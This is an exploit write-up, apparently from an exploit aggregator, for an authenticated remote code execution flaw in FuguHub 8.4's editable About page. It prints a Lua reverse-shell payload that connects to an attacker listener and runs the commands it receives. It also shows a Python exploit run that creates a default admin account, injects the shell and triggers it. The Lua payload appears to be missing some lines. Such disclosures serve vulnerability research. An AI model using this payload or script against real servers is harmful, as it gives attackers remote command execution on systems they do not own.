## https://sploitus.com/exploit?id=0A3D543B-33AB-576D-B7C7-638C31265909
## FuguHub 8.4 Authenticated RCE
Fuguhub is a Cloud Media Server Software. The version tested was the debian version at this link:
`https://fuguhub.com/articles/FuguHub-for-Debian` An issue in Real Time Logic LLC FuguHub v.8.4 allows a local attacker to execute arbitrary code via a crafted script to the About Page of the Adminstrator panel.
<p align="center"> <img src="images/fugu2.png" alt="Screenshot showing the Download Page of FuguHub">
<br> <em>Screenshot showing the Download Page of FuguHub</em> </p>
### Installation Steps:
wget FuguHub.com/install/FuguHub.linux.install
chmod +x FuguHub.linux.install
sudo ./FuguHub.linux.install
### Vulnerability Description
The about page is an editable lua page whose content can be changed through the Administrator panel. The vunlerability inserts a reverse shell written in lua into the About page which is viewable to both logged in and logged out users
<p align="center"> <img src="images/fugu1.png" alt="Screenshot showing the About page which is editable by FuguHub Admin">
<br> <em>Screenshot showing the About page which is editable by FuguHub Admin</em> </p>
### Exploitation process
FuguHub prompts the user to create an admin user, this can also be done on this page: ``
Once created teh admin can Customise Server on this link: `` this allows the user to edit the `About` page which we can see has a lua code section that we can inject code into
<p align="center"> <img src="images/fugu3.png" alt="Screenshot showing editable lsp code that runs server side to return software version">
<br> <em>Screenshot showing editable lsp code that runs server side to return software version, this is the insertion point for the reverse shell</em> </p>
### Payload
Here is an example payload:
<?lsp if request:method() == "GET" then ?>
local host, port = "", 4444
local socket = require("socket")
local tcp = socket.tcp()
local io = require("io")
local connection, err = tcp:connect(host, port)
if not connection then
print("Error connecting: " .. err)
while true do
local cmd, status, partial = tcp:receive()
if status == "closed" or status == "timeout" then break end
if cmd then
local f = io.popen(cmd, "r")
local s = f:read("*a")
<?lsp else ?>
Wrong request method, goodBye!
<?lsp end ?>
An alternative single line payload can be obtained at revshells.com
<p align="center"> <img src="images/fugu4.png" alt="Screenshot of lua reverse shell from revshells.com">
<br> <em>Screenshot of lua reverse shell from revshells.com</em> </p>
### Python Exploit
During my attempts to automate this exploit, I found CVE-2023-24078 which found a file upload vulnerability on FuguHub. That exploit was done using python and had automated logging in / account creation. I used the authentication portion of this exploit and then added code to whcih exploits my newly discovered insertion point on the customize.lsp page. My python exploit is included in the repo under exploit.py
### Python Exploit usage
`usage: exploit.py [-h] -r RHOST [-rp RPORT] -l LHOST -p LPORT`
└─$ python3 exploit.py -r 192.168.XXX.XXX -rp 80 -l 192.168.XXX.XXX -p 5555
[*] Checking for admin user...
[+] No admin user exists yet, creating account with admin:password
[+] User created!
[+] Logging in...
[+] Success! Injecting the reverse shell...
[+] Successfully injected the reverse shell into the About page.
[+] Triggering the reverse shell, check your listener...